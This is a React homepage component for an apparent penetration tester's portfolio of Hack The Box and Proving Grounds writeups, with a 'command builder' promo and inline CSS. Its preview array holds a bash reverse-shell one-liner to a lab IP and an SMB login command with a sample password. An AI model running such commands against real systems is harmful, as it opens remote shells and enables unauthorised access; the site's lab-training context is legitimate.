import { useState, useEffect } from "react";
import { Link } from "react-router-dom";
import { writeupAPI, statsAPI } from "@/lib/api";
import WriteupCard from "@/components/WriteupCard";
import SEO from "@/components/SEO";
import { SITE, CREDENTIALS } from "@/lib/site";
import {
  ChevronRight,
  Download,
  Globe,
  Mail,
  Server,
  Shield,
  Terminal,
} from "lucide-react";

const API_URL = process.env.REACT_APP_BACKEND_URL;

function useStyles() {
  useEffect(() => {
    if (!document.querySelector("link[data-ctf-fonts]")) {
      const link = document.createElement("link");
      link.rel = "stylesheet";
      link.href =
        "https://fonts.googleapis.com/css2?family=DM+Sans:wght@500;700;800&family=Share+Tech+Mono&family=JetBrains+Mono:wght@300;400;500;700&display=swap";
      link.setAttribute("data-ctf-fonts", "1");
      document.head.appendChild(link);
    }

    if (!document.querySelector("style[data-hp]")) {
      const style = document.createElement("style");
      style.setAttribute("data-hp", "1");
      style.textContent = HP_CSS;
      document.head.appendChild(style);
    }
  }, []);
}

const HERO_COPY =
  "I'm Maxwell Ferreira. I solve machines on Hack The Box and Proving Grounds, then write up every step — recon, the exploit chain, the privilege escalation, and what I'd do differently.";

const PILLARS = [
  {
    icon: Globe,
    title: "Web Exploitation",
    text: "SQL injection, auth bypass, SSTI and file-upload flaws — found, chained, and turned into a shell.",
    accent: "#00d4ff",
  },
  {
    icon: Server,
    title: "Active Directory",
    text: "Kerberoasting, AS-REP roasting, RBCD and delegation abuse — from a single foothold to Domain Admin.",
    accent: "#00ff88",
  },
  {
    icon: Shield,
    title: "Privilege Escalation",
    text: "SUID binaries, sudo rules, capabilities and service misconfigs — Linux and Windows, user to root.",
    accent: "#ff8c42",
  },
];

// Kept in sync with the Command Builder page by hand — if that catalogue grows,
// bump this number so the homepage does not undersell it.
const ARSENAL_COUNT = 66;

const ARSENAL_SAMPLE = [
  "nmap -A -T4 -p- -sV 10.10.10.10 -oN scan.txt",
  "nxc smb 10.10.10.10 -u administrator -p 'P@ssw0rd' --shares",
  "bash -i >& /dev/tcp/10.10.14.1/9001 0>&1",
];

const SITE_ORIGIN = "https://www.maxoffsec.com";

// Structured data for the homepage: who runs the site + the site itself.
const HOME_JSONLD = [
  {
    "@context": "https://schema.org",
    "@type": "WebSite",
    name: "ZeroDay.log",
    url: `${SITE_ORIGIN}/`,
    author: { "@type": "Person", name: SITE.name },
  },
  {
    "@context": "https://schema.org",
    "@type": "Person",
    name: SITE.name,
    url: `${SITE_ORIGIN}/`,
    jobTitle: "Offensive Security Engineer / Penetration Tester",
    sameAs: [SITE.social.linkedin, SITE.social.github].filter(Boolean),
    knowsAbout: [
      "Penetration Testing",
      "Red Team",
      "Active Directory",
      "Web Exploitation",
      "Privilege Escalation",
    ],
    hasCredential: CREDENTIALS.map((c) => ({
      "@type": "EducationalOccupationalCredential",
      credentialCategory: "certification",
      name: c,
    })),
  },
];

const SkeletonCard = () => (
  <div className="hp-sk-card">
    <div className="hp-sk hp-sk-s" />
    <div className="hp-sk hp-sk-m" />
    <div className="hp-sk hp-sk-l" />
    <div className="hp-sk hp-sk-m" />
  </div>
);

const HomePage = () => {
  useStyles();

  const [featuredWriteups, setFeaturedWriteups] = useState([]);
  const [stats, setStats] = useState(null);
  const [loading, setLoading] = useState(true);
  const [typedText, setTypedText] = useState("");

  useEffect(() => {
    const fetchData = async () => {
      try {
        const [featuredRes, statsRes] = await Promise.all([
          writeupAPI.getFeatured(),
          statsAPI.get(),
        ]);

        setFeaturedWriteups(featuredRes.data);
        setStats(statsRes.data);
      } catch (error) {
        console.error(error);
      } finally {
        setLoading(false);
      }
    };

    fetchData();
  }, []);

  useEffect(() => {
    // The subtitle is the one line that says who this is. It must not take
    // three and a half seconds to become readable, and it must not animate at
    // all for someone who asked the OS for less motion.
    const reduceMotion =
      typeof window !== "undefined" &&
      window.matchMedia?.("(prefers-reduced-motion: reduce)").matches;

    if (reduceMotion) {
      setTypedText(HERO_COPY);
      return undefined;
    }

    // Pin the whole reveal to ~1.2s regardless of how long the copy gets.
    const TOTAL_MS = 1200;
    const step = Math.max(1, Math.ceil(HERO_COPY.length / (TOTAL_MS / 16)));
    let index = 0;
    const timer = setInterval(() => {
      index = Math.min(HERO_COPY.length, index + step);
      setTypedText(HERO_COPY.slice(0, index));
      if (index >= HERO_COPY.length) clearInterval(timer);
    }, 16);

    return () => clearInterval(timer);
  }, []);

  const owned = stats?.machines_owned || 0;
  const skillsTracked = stats?.popular_skills?.length || 0;

  // Only surface a stat when it has a real, non-zero value — never render an
  // empty or zero stat tile (it reads as "broken" to a recruiter).
  const formatCount = (n) =>
    n >= 1000 ? `${(n / 1000).toFixed(n >= 10000 ? 0 : 1)}k` : `${n}`;
  // Numbers that grow with work, not with luck. A public view counter reading
  // in the low hundreds is negative proof — it says nobody reads this. Traffic
  // lives in analytics; the hero shows what was built.
  const heroStats = [
    { value: owned, label: "machines documented" },
    { value: CREDENTIALS.length, label: "offensive certifications" },
    { value: skillsTracked, label: "tracked skills" },
  ].filter((s) => Number(s.value) > 0);

  return (
    <div className="hp-root" data-testid="home-page">
      <SEO
        title="ZeroDay.log"
        description="Offensive security writeups by Maxwell Ferreira — Hack The Box and Proving Grounds machines documented end to end: recon, exploitation, and privilege escalation. OSCP+, CRTO, eWPTXv2."
        canonical="/"
        jsonLd={HOME_JSONLD}
      />

      <section className="hp-hero">
        <div className="hp-hero-grid" aria-hidden="true" />
        <div className="hp-hero-glow" aria-hidden="true" />
        <div className="hp-hero-noise" aria-hidden="true" />

        <div className="hp-shell hp-hero-shell">
          <div className="hp-hero-copy">
            <div className="hp-kicker">
              <span className="hp-kicker-mark">$</span>
              offensive security portfolio
              <span className="hp-blink" />
            </div>

            <h1 className="hp-title">I break into Active Directory and web apps, then document exactly how.</h1>

            <p className="hp-subtitle" aria-label={HERO_COPY}>
              <span aria-hidden="true">{typedText}</span>
              {typedText.length < HERO_COPY.length && <span className="hp-cursor" aria-hidden="true" />}
            </p>

            {/* Credential bar */}
            <div className="hp-cred-row" aria-label="Certifications">
              {CREDENTIALS.map((cred) => (
                <span key={cred} className="hp-cred-chip">{cred}</span>
              ))}
            </div>

            <div className="hp-cta-row">
              <Link to="/writeups" className="hp-btn hp-btn-primary" data-testid="hero-browse-btn">
                <Terminal size={14} /> Explore Writeups
              </Link>
              <a href={SITE.resumeUrl} download className="hp-btn hp-btn-secondary" data-testid="hero-resume-btn">
                <Download size={13} /> Download Résumé
              </a>
              <Link to="/contact" className="hp-btn hp-btn-secondary" data-testid="hero-contact-btn">
                <Mail size={13} /> Contact Me
              </Link>
            </div>

            {heroStats.length > 0 && (
              <div className="hp-signal-strip">
                {heroStats.map((s) => (
                  <div className="hp-signal-card" key={s.label}>
                    <span className="hp-signal-num">{formatCount(Number(s.value))}</span>
                    <span className="hp-signal-label">{s.label}</span>
                  </div>
                ))}
              </div>
            )}
          </div>
        </div>
      </section>

      {/* The Command Builder is the only page here someone bookmarks and comes
          back to every week. It was buried three items deep in the nav; it
          belongs above the fold of the body. */}
      <section className="hp-section hp-arsenal">
        <div className="hp-shell">
          <div className="hp-arsenal-grid">
            <div>
              <span className="hp-section-kicker">// arsenal</span>
              <h2 className="hp-section-title">Set your LHOST once. Copy commands that already work.</h2>
              <p className="hp-section-text">
                {ARSENAL_COUNT} commands across recon, reverse shells, Active Directory, pivoting, web and password
                attacks. Fill in the target once and every snippet on the page updates with it.
              </p>
              <div className="hp-cta-row" style={{ marginTop: "1.25rem", marginBottom: 0 }}>
                <Link to="/command-builder" className="hp-btn hp-btn-primary">
                  <Terminal size={14} /> Open the Arsenal
                </Link>
              </div>
            </div>

            <div className="hp-arsenal-preview" aria-hidden="true">
              <div className="hp-arsenal-bar">
                <span className="hp-arsenal-dot" />
                <span className="hp-arsenal-bar-label">command-builder</span>
              </div>
              {ARSENAL_SAMPLE.map((line) => (
                <div className="hp-arsenal-line" key={line}>
                  <span className="hp-arsenal-prompt">$</span>
                  <code>{line}</code>
                </div>
              ))}
            </div>
          </div>
        </div>
      </section>

      {/* Writeups come first — the archive is the point of the site. */}
      <section className="hp-section hp-archive">
        <div className="hp-shell">
          <div className="hp-archive-head">
            <div>
              <span className="hp-section-kicker">// archive</span>
              <h2 className="hp-section-title">Latest writeups.</h2>
            </div>
            <Link to="/writeups" className="hp-btn hp-btn-secondary">
              All writeups <ChevronRight size={13} />
            </Link>
          </div>

          {loading ? (
            <div className="hp-grid-3">
              {[...Array(3)].map((_, index) => (
                <SkeletonCard key={index} />
              ))}
            </div>
          ) : featuredWriteups.length > 0 ? (
            <div className="hp-grid-3" data-testid="featured-writeups">
              {featuredWriteups.map((writeup) => (
                <WriteupCard key={writeup.id} writeup={writeup} />
              ))}
            </div>
          ) : (
            <div className="hp-empty">
              <Terminal size={36} color="#2e4a5a" />
              <p>No writeups yet. Starting the archive.</p>
            </div>
          )}
        </div>
      </section>

      <section className="hp-section hp-manifesto">
        <div className="hp-shell">
          <div className="hp-section-head">
            <span className="hp-section-kicker">// what's here</span>
            <h2 className="hp-section-title">Real machines, documented end to end.</h2>
            <p className="hp-section-text">
              No storytelling, no filler — the commands I ran, the exploit that worked, and the reasoning behind each
              step, so the path is easy to follow again.
            </p>
          </div>

          <div className="hp-pillar-grid">
            {PILLARS.map((pillar) => {
              const Icon = pillar.icon;
              return (
                <article key={pillar.title} className="hp-pillar-card">
                  <div className="hp-pillar-icon" style={{ color: pillar.accent, borderColor: `${pillar.accent}55` }}>
                    <Icon size={18} />
                  </div>
                  <h3>{pillar.title}</h3>
                  <p>{pillar.text}</p>
                </article>
              );
            })}
          </div>
        </div>
      </section>

      <section className="hp-section hp-cta">
        <div className="hp-shell hp-cta-shell">
          <div className="hp-cta-copy">
            <span className="hp-section-kicker">// contact</span>
            <h2 className="hp-section-title">Open to offensive security work.</h2>
            <p className="hp-section-text">
              Hiring a pentester, or want to compare notes on a box? Drop me a line — I read everything.
            </p>
          </div>

          <div className="hp-cta-actions">
            <Link to="/contact" className="hp-btn hp-btn-primary">
              Get in Touch
            </Link>
            <Link to="/writeups" className="hp-btn hp-btn-secondary">
              Browse Archive
            </Link>
          </div>
        </div>
      </section>
    </div>
  );
};

const HP_CSS = `
@keyframes hp-fadein { from { opacity: 0; transform: translateY(14px); } to { opacity: 1; transform: translateY(0); } }
@keyframes hp-blink { 0%, 100% { opacity: 1; } 50% { opacity: 0; } }
@keyframes hp-shimmer { 0% { background-position: 200% 0; } 100% { background-position: -200% 0; } }

.hp-root {
  background: #070a0e;
  background-image:
    linear-gradient(rgba(0,255,136,.012) 1px, transparent 1px),
    linear-gradient(90deg, rgba(0,255,136,.012) 1px, transparent 1px);
  background-size: 44px 44px;
  color: #b8c4d0;
  font-family: 'JetBrains Mono', ui-monospace, monospace;
}

.hp-shell {
  max-width: 1220px;
  margin: 0 auto;
  padding: 0 2rem;
}

.hp-hero {
  position: relative;
  overflow: hidden;
  padding: 6rem 0 4.5rem;
  border-bottom: 1px solid #1a2738;
}

.hp-hero-grid {
  position: absolute;
  inset: 0;
  pointer-events: none;
  background-image:
    linear-gradient(rgba(0,255,136,.025) 1px, transparent 1px),
    linear-gradient(90deg, rgba(0,255,136,.025) 1px, transparent 1px);
  background-size: 44px 44px;
}

.hp-hero-glow {
  position: absolute;
  inset: 0;
  pointer-events: none;
  background:
    radial-gradient(ellipse 780px 420px at 18% 20%, rgba(0,255,136,.09) 0%, transparent 70%),
    radial-gradient(ellipse 460px 320px at 88% 22%, rgba(0,212,255,.05) 0%, transparent 65%),
    radial-gradient(ellipse 420px 280px at 72% 88%, rgba(204,68,255,.04) 0%, transparent 60%);
}

.hp-hero-noise {
  position: absolute;
  inset: 0;
  pointer-events: none;
  opacity: .028;
  background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 200 200' xmlns='http://www.w3.org/2000/svg'%3E%3Cfilter id='n'%3E%3CfeTurbulence type='fractalNoise' baseFrequency='.85' numOctaves='4' stitchTiles='stitch'/%3E%3C/filter%3E%3Crect width='100%25' height='100%25' filter='url(%23n)'/%3E%3C/svg%3E");
}

.hp-hero-shell {
  position: relative;
  z-index: 1;
  max-width: 760px;
}

.hp-hero-copy {
  animation: hp-fadein .45s ease both;
}

.hp-kicker,
.hp-section-kicker {
  display: inline-flex;
  align-items: center;
  gap: 8px;
  font-family: 'Share Tech Mono', monospace;
  font-size: 11px;
  text-transform: uppercase;
  letter-spacing: .14em;
  color: #56657a;
}

.hp-kicker {
  padding: 5px 11px;
  border: 1px solid #1a2738;
  background: rgba(12,17,24,.62);
  margin-bottom: 1.25rem;
}

.hp-kicker-mark {
  color: #00ff88;
}

.hp-blink,
.hp-cursor {
  display: inline-block;
  width: 8px;
  height: 14px;
  margin-left: 2px;
  background: #00ff88;
  animation: hp-blink 1.1s step-end infinite;
}

.hp-title {
  max-width: 10.5ch;
  margin: 0 0 .9rem;
  font-family: 'DM Sans', system-ui, sans-serif;
  font-size: clamp(2rem, 4.5vw, 3.35rem);
  font-weight: 800;
  line-height: 1.02;
  letter-spacing: -.045em;
  color: #eef4fb;
}

.hp-subtitle {
  max-width: 58ch;
  min-height: 48px;
  margin: 0 0 1.15rem;
  font-size: 13px;
  line-height: 1.8;
  color: #8da1b7;
}

.hp-chip-row {
  display: flex;
  flex-wrap: wrap;
  gap: 8px;
  margin-bottom: 1.35rem;
}

.hp-mini-chip {
  padding: 4px 9px;
  border: 1px solid #1a2738;
  background: transparent;
  color: #00d4ff;
  font-family: 'Share Tech Mono', monospace;
  font-size: 9px;
  letter-spacing: .13em;
  text-transform: uppercase;
}

.hp-cred-row {
  display: flex;
  flex-wrap: wrap;
  gap: 8px;
  margin-bottom: 1.35rem;
}

.hp-cred-chip {
  padding: 5px 11px;
  border: 1px solid rgba(0,255,136,.32);
  background: rgba(0,255,136,.06);
  color: #00ff88;
  font-family: 'Share Tech Mono', monospace;
  font-size: 11px;
  letter-spacing: .1em;
  text-transform: uppercase;
}

.hp-cta-row {
  display: flex;
  flex-wrap: wrap;
  gap: 10px;
  margin-bottom: 1.5rem;
}

.hp-btn {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  gap: 8px;
  padding: 11px 18px;
  border: 1px solid transparent;
  border-radius: 3px;
  text-decoration: none;
  font-family: 'JetBrains Mono', monospace;
  font-size: 12px;
  letter-spacing: .08em;
  text-transform: uppercase;
  transition: all .2s ease;
}

.hp-btn-primary {
  background: rgba(0,255,136,.11);
  border-color: rgba(0,255,136,.38);
  color: #00ff88;
  box-shadow: 0 0 20px rgba(0,255,136,.08);
}

.hp-btn-primary:hover {
  background: rgba(0,255,136,.18);
  border-color: rgba(0,255,136,.55);
}

.hp-btn-secondary {
  background: transparent;
  border-color: #1a2738;
  color: #8da1b7;
}

.hp-btn-secondary:hover {
  color: #e2eaf3;
  border-color: #31455c;
}

.hp-signal-strip {
  display: grid;
  grid-template-columns: repeat(2, minmax(0, 180px));
  gap: 10px;
  max-width: 380px;
}

.hp-signal-card {
  padding: .9rem .95rem .85rem;
  border: 1px solid #1a2738;
  background: rgba(12,17,24,.58);
}

.hp-signal-num {
  display: block;
  margin-bottom: .25rem;
  font-family: 'DM Sans', system-ui, sans-serif;
  font-size: 1.45rem;
  font-weight: 800;
  line-height: 1;
  color: #e2eaf3;
}

.hp-signal-label {
  display: block;
  font-size: 9px;
  text-transform: uppercase;
  letter-spacing: .12em;
  color: #56657a;
}

.hp-section {
  border-top: 1px solid #1a2738;
}

.hp-manifesto {
  background: #0c1118;
}

.hp-section-head,
.hp-archive-head {
  margin-bottom: 1.6rem;
}

.hp-section-head,
.hp-cta-copy {
  max-width: 760px;
}

.hp-section-title {
  margin: .55rem 0 .8rem;
  font-family: 'DM Sans', system-ui, sans-serif;
  font-size: clamp(1.45rem, 3.6vw, 2.2rem);
  font-weight: 800;
  line-height: 1.06;
  letter-spacing: -.035em;
  color: #e2eaf3;
}

.hp-section-text {
  margin: 0;
  font-size: 13px;
  line-height: 1.9;
  color: #7f96ac;
}

.hp-pillar-grid {
  display: grid;
  grid-template-columns: repeat(3, minmax(0, 1fr));
  gap: 1rem;
}

.hp-pillar-card {
  border: 1px solid #1a2738;
  background: #070a0e;
}

.hp-pillar-card {
  padding: 1.4rem;
}

.hp-pillar-icon {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  width: 42px;
  height: 42px;
  margin-bottom: 1rem;
  border: 1px solid;
}

.hp-pillar-card h3 {
  margin: 0 0 .55rem;
  font-family: 'DM Sans', system-ui, sans-serif;
  font-weight: 700;
  color: #e2eaf3;
  letter-spacing: -.02em;
}

.hp-pillar-card p {
  margin: 0;
  color: #7f96ac;
  font-size: 12px;
  line-height: 1.75;
}

.hp-arsenal {
  background: #0c1118;
}

.hp-arsenal-grid {
  display: grid;
  grid-template-columns: minmax(0, 1fr) minmax(0, 1.05fr);
  gap: 2rem;
  align-items: center;
}

.hp-arsenal-preview {
  border: 1px solid #1a2738;
  background: #070a0e;
  overflow: hidden;
}

.hp-arsenal-bar {
  display: flex;
  align-items: center;
  gap: 8px;
  padding: 9px 12px;
  border-bottom: 1px solid #1a2738;
  background: rgba(12,17,24,.85);
}

.hp-arsenal-dot {
  width: 8px;
  height: 8px;
  border-radius: 50%;
  background: #00ff88;
}

.hp-arsenal-bar-label {
  font-family: 'Share Tech Mono', monospace;
  font-size: 10px;
  letter-spacing: .14em;
  text-transform: uppercase;
  color: #56657a;
}

.hp-arsenal-line {
  display: flex;
  gap: 10px;
  padding: 11px 14px;
  border-bottom: 1px solid rgba(26,39,56,.55);
  overflow-x: auto;
}

.hp-arsenal-line:last-child {
  border-bottom: 0;
}

.hp-arsenal-prompt {
  color: #00ff88;
  flex: none;
}

.hp-arsenal-line code {
  font-family: 'JetBrains Mono', ui-monospace, monospace;
  font-size: 12px;
  line-height: 1.6;
  color: #8da1b7;
  white-space: pre;
}

.hp-archive-head {
  display: flex;
  justify-content: space-between;
  gap: 1rem;
  align-items: end;
}

.hp-grid-3 {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
  gap: 1.2rem;
}

.hp-sk-card {
  display: flex;
  flex-direction: column;
  gap: 10px;
  padding: 1.4rem;
  border: 1px solid #1a2738;
  background: #0c1118;
}

.hp-sk {
  height: 10px;
  border-radius: 2px;
  background: linear-gradient(90deg, #1a2738 25%, #243448 50%, #1a2738 75%);
  background-size: 200% 100%;
  animation: hp-shimmer 1.5s ease infinite;
}

.hp-sk-s { width: 34%; }
.hp-sk-m { width: 62%; }
.hp-sk-l { width: 92%; }

.hp-empty {
  display: flex;
  flex-direction: column;
  align-items: center;
  gap: .8rem;
  padding: 4rem 2rem;
  border: 1px solid #1a2738;
  background: #0c1118;
  color: #56657a;
}

.hp-cta-shell {
  display: grid;
  grid-template-columns: 1fr;
  gap: 1.2rem;
  align-items: stretch;
}

.hp-cta {
  background:
    radial-gradient(ellipse 600px 260px at 70% 30%, rgba(0,255,136,.06), transparent 70%),
    #070a0e;
}

.hp-cta-shell {
  align-items: center;
}

.hp-cta-actions {
  display: flex;
  flex-direction: column;
  gap: 10px;
  align-items: start;
}

.hp-proof {
  display: inline-flex;
  align-items: center;
  gap: 7px;
  margin-top: .6rem;
  color: #56657a;
  font-family: 'Share Tech Mono', monospace;
  font-size: 10px;
  text-transform: uppercase;
  letter-spacing: .12em;
}

@media (max-width: 1040px) {
  .hp-title {
    max-width: 11ch;
  }
}

@media (max-width: 860px) {
  .hp-pillar-grid {
    grid-template-columns: 1fr;
  }

  .hp-arsenal-grid {
    grid-template-columns: 1fr;
  }

  .hp-signal-strip {
    grid-template-columns: repeat(2, minmax(0, 1fr));
    max-width: 100%;
  }

  .hp-archive-head {
    flex-direction: column;
    align-items: start;
  }
}

@media (max-width: 640px) {
  .hp-shell {
    padding: 0 1rem;
  }

  .hp-hero {
    padding: 4.5rem 0 3rem;
  }

  .hp-title {
    max-width: none;
    font-size: clamp(1.7rem, 9vw, 2.45rem);
  }

  .hp-pillar-grid,
  .hp-signal-strip {
    grid-template-columns: 1fr;
  }
}
`;

export default HomePage;
